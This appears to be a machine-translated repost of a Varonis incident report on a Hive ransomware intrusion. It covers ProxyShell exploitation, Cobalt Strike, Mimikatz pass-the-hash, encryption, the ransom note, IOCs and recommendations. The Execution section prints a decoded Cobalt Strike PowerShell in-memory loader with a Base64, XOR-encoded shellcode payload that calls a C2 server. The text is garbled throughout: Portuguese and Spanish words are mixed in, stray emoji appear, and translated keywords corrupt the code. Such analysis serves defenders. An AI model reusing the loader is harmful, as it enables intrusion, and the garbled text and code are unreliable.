Hive ransomware analysis (2023)

During a recent customer engagement, Varonis' forensics team investigated a ransomware incident. Several device and file servers were compromised and encrypted by a malicious threat group known as Hive.

Hive, which was first observed in June 2021, is an affiliate-based ransomware variant used by cybercriminals to conduct ransomware attacks against healthcare facilities, nonprofits, retailers, energy providers, and other industries. in the whole world. O Hive was projected to be distributed in umRansomware as a Servicemodel that allows affiliates to use it as they see fit.

The variant uses common ransomware tactics, techniques, and procedures (TTPs) to compromise victims' devices. When performing live actions, the operator disables anti-malware protections and then extracts sensitive data and encrypts commercial files. Its affiliates use various mechanisms to compromise their victims' networks, including phishing emails with malicious attachments, leaking VPN credentials, and exploiting vulnerabilities in external assets. Furthermore, Hive places a ransom note in plain text that threatens to publish the victim's data on the TOR website 'HiveLeaks' unless the victim complies with the attacker's conditions.

observation of the attack

Etapa 1: ProxyShell e WebShell

Stage 2: Cobalt Strike

The PowerShell malware downloaded additional stages from a remote C2 (Command and Control) server associated with the Cobalt Strike framework. Scenarios were not written to the file system, but played in memory.

Stage 3: Mimikatz and Pass-The-Hash

Leveraging SYSTEM permissions, the threat actor created a new sysadmin user named "user" and proceeded to the credential dump stage, invokingMimikatz🇧🇷 By stealing the domain administrator's NTLM hash and without having to crack the password, the operator was able to reuse it through the Pass-The-Hash attack and take control of the domain administrator's account.

Phase 4: Analysis of confidential information

The threat actor performed extensive discovery activities across the entire network. In addition to looking for files that contain "password" in their names, activities observed included scanning the network and collecting IP addresses and device names from networks, followed by RDP to backup servers and other critical assets.

Stage 5: Implementing the ransomware

Ultimately, a custom malware payload called Windows.exe was delivered and executed on multiple devices, leading to extensive encryption and denial of access to files within the organization.

The payload created a plain text ransomware demand note during the encryption phase.

initial access

The initial indicator of compromise was the successful exploitation of Microsoft Exchange through vulnerabilities known as ProxyShell.

Unveiled in August 2021, ProxyShell is a Remote Code Execution (RCE) vulnerability. ProxyShell involves a set of three separate security flaws and allows remote attackers to execute arbitrary code on affected Microsoft Exchange Server installations.

CVE-2021-34473 (base score: 9.8)

Microsoft Exchange Server Remote Code Execution Vulnerability.

CVE-2021-34523 (base score: 9.8)

Microsoft Exchange Server Elevation of Privilege Vulnerability

CVE-2021-31207 (base score: 7.2)

Microsoft Exchange Server Security Feature Bypass Vulnerability

Microsoft released patches for these three vulnerabilities in April and May 2021 as part of its "Patch Tuesday" releases. CVE-2021-34473 and CVE-2021-34523 were patched (KB5001779) in April 2021. CVE-2021-31207 was patched (KB5003435) in May.

During the investigation, we found evidence of specific exploitation of these CVEs (Common Vulnerabilities and Exposures), which allowed the adversary to successfully deploy webshells on the compromised server.

According to our analysis, four different IP addresses accessed the malicious files:

139.60.161.228 (EE. UU.)

ASN: CHAVE DO HOST

RELATED ACTIVITY: Cobalt Strike C2 and Log4j Vulnerability Analysis

139.60.161.56 (UE)

ASN: CHAVE DO HOST

RELATED ACTIVITY: Cobalt Strike C2 and Log4j Vulnerability Analysis

185.70.184.8 (Netherlands)

ASN: CHAVE DO HOST

RELATED ACTIVITY: Cobalt Strike C2 and Log4j Vulnerability Scan. Associated with Emotet, IcedID and QBot.

91,208,52,149 (Netherlands)

ASN: SERVER-A

The following malicious files were detected:

These filenames are made up of random characters that seem to have no meaning. Attackers often use this technique to prevent third parties from finding webshells online by sending HTTP requests to a list of pre-built names that are part of other campaigns.

The source code for the defined webshells is taken from a public git repository athttps://github.com/ThePacketBender/webshells.

Execution

Establishing a base on the compromised Exchange Server, the threat actor executed several PowerShell commands designed to download malicious files from the remote C2 server to the victim's computer. Attackers would execute malware using commands such as Invoke-Expression (IEX) or by downloading the file's contents directly into the device's memory and executing it:

Additionally, attackers executed an additional obfuscated PowerShell script that was part of the Cobalt Strike framework:

The Base64 encoded command contains several layers of encoding, but is decoded into the following PowerShell command:

function func_get_proc_address {Param ($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[- 1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices. HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods .GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type {Param ([Parameter(Position = 0, Obligatorio = $True)] [Type[] ] $var_parameters,[Parameter(Position = 1)] [Tipo] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.E mit.As semblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])$var_type_builder.DefineConstructor(' RTSpecialName, HideBySig , Público', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ var_return_type, $ var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIx LcptVXJ6ra yCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDBpbdHcjt/oD/JWHd4sCLmyO98yFY4rSkNpnTutksFjPk1iId3VatKb1qXZnUlBHxy9uRECX2FYx1tCT2QCAktdtYyitbmqWDvjVGRB9bSN2UEZRDmJERk1XGQNuTFlKT09CDBcNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNEwouKSPHnhscH1J2ehVV9xiGIbRbaqS5cqjAmVwq68rbHTbqKwvVPYdIwQX2sCpP4Huf69SBXmMT5Uf78YpcuINAFMaQSn2ghpZ2G7UnqTkvRtIxy6TiOP3eK6FQ1llgA3N8VNacREpvDLUIaZ6/oaEPfm0YlN8JZlys9JSvydexNohj88pn9o2SyWlVIxY8cJLweQz1ZdO2JIzPEnVW4x52BGHMgFqryhE8N1PEyfVnFL/7oUr8aGQvMsusR84zVxpx5+C6a+SP9iBhlQcdopF5Zu0hJsRfacn4nFrojL1nt+/oBQcjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIQGg0VEw0SFRINEREbIzpKg64=')for ($x = 0; $x -lt $código_var.Cuenta; $x++) {$var_code[$x] = $var_code[$x] -bxor 35}Saída de escritura $var_code

The additional "for loop" function adds another layer of obfuscation and XORs the Base64 code with a key of 35. We successfully extracted the C2 destination IP address by mimicking the process, which unsurprisingly turned out to be the same address as found earlier.

Converting Base64 to a hexadecimal string and reformatting with a Python script restored the malicious file. The VirusTotal analysis shows 23 out of 52 antivirus detections and attributes the file to the Cobalt Strike framework.

Persistence

With the NT AUTHORITY\SYSTEM privileges provided and to maintain persistence on the compromised server, a newly created account was created, followed by the name "user" and added to the "Remote Desktop Users" and "Administrators" groups. The user was used for multipath access to files related to "passwords", RDP access to backup servers, and more.

access to credentials

The threat actor used Mimikatz, a post-exploitation tool, specifically the SekurLSA "logonPasswords" module, which extracts NTLM passwords and hashes from registered accounts on the system and saves the results to a text file on the system. With the administrator's NTLM hash in hand, the threat actor used the pass-the-hash technique to gain highly privileged access to other assets on the network by launching a new command prompt on the affected system:

lateral movement

Leveraging the stolen domain administrator account, the actor made RDP access requests using mstsc.exe following the "/v" parameter to various devices on the network, primarily looking for servers associated with network backups and SQL servers. We strongly believe these actions were taken to confirm the ability to access critical servers prior to the ransomware being deployed.

Discovery

A popular public network scanning tool called "SoftPerfect" was used to perform scans on domain assets.

Using the tool, the threat actor acquired the list of domain devices and saved the results to a text file named "domains.txt". To find all active hosts, the attacker ran a batch script called "p.bat", which pinged the list of domains and saved the results to a text file called "res.txt".

The p.bat script and file naming convention correspond to part of the Conti ransomware toolkit, which was provided to the group's affiliates and first leaked on August 21, 2022 andposted on twitter🇧🇷 This indicates that Hive affiliates are adopting other ransomware gang techniques.

Impact

Threat actors began their final actions by distributing a file called "windows.exe", which was the ransomware payload written in Golang. The payload performs several operations including shadow copy deletion, disabling security products, cleaning Windows event logs and closing file handles to ensure a smooth encryption process. Below is a brief documentation of the commands executed:

The ransomware goes through all available folders encrypting included files and drops a ransom note called "_HOW_TO_DECRYPT.txt" in each folder. Once encryption is completed, it displays the ransom note to inform user about the attack.

Your network has been breached and all data has been encrypted. Personal data, financial reports and important documents are ready to be disclosed. In order to decrypt all data and prevent extracted files from being disclosed to http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/, you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: Password: To access .onion websites, download and install the Tor browser from: https://www.torproject.org/ (the Tor browser not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key. files Your data cannot be decrypted. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They just won't let you pay. As a result, you will lose everything. - Do not hire a recovery company. They cannot decrypt without the key. They also don't care about your business. They think they are good negotiators, but they are not. They usually fail. So speak for yourself. - Do not reject the purchase. Extracted files will be made publicly available.

conclusions

Ransomware attacks have grown significantly in recent years and remain the preferred method for threat actors looking to maximize profit. The impact of an attack can be damaging. It can potentially damage an organization's reputation, disrupt regular operations, and cause temporary and possibly permanent loss of sensitive data.

While detecting and responding to these incidents can be challenging, most malicious activity can be prevented with security tools, incident response plans, and patches for known vulnerabilities.

recommendations

The Varonis Forensics Team recommends the following:

• CorrectionExchange Server for the latest Exchange Cumulative Update (CU) and Security Update (SU) provided by Microsoft.
• Enforce the use of complex passwords and require users to change passwords regularly.
• Use oMicrosoft LAPSsolution to revoke local administrator permissions from domain accounts (the principle of least privilege) and regularly scan and remove inactive user accounts.
• Block SMBv1and use SMB signing to protect against pass-the-hash attacks.
• Restrict access to the minimum required for the employee's role.
• Automatically detect and prevent access control changes that violate your business rules.
• Train employees on security principles and ensure they receive security training as part of their cybersecurity plans.
• Establish basic security practices and define rules of behavior that describe how to manage and protect organization and customer information and other vital data.

MITER deployment

1. Initial access

• Take advantage of the public-facing app (T1190)
• CVE-2021-34473
• CVE-2021-34523
• CVE-2021-31207

2. Execution

• User execution (T1204)
• malicious file (T1204.002)

• Command and script interpreter (T1059)
• Power Shell (T1059.001)

3. Persistence

• Create an account (T1136)
• domain account (T1136.002)

• Valid accounts (T1078)
• Domain accounts (T1078.002)

4. Privilege escalation

• Valid accounts (T1078)
• Domain accounts (T1078.002)

5. Defense Evasion

• Deobfuscate/Decrypt files or information (T1140)
• Removing the flag on the host (T1070)
• Erase Windows event logs (T1070.001)

6. Access with Credentials

• Operating system credentials dump (T1003)
• Cached domain credentials (T1003.005)

7. Discovery

• Discovery of remote systems (T1018)

8. Lateral movement

• Remote services (T1021)
• Remote Desktop Protocol (T1021.001)

9. Command and Control

• Application Layer Protocol (T1071)
• web protocols (T1071.001)

10. Impact

• Encrypted data for impact (T1486)

COI

Created user account names

• "User name"

malicious IPs

• 139.60.161.228
• 139.60.161.56
• 91.208.52.149
• 185.70.184.8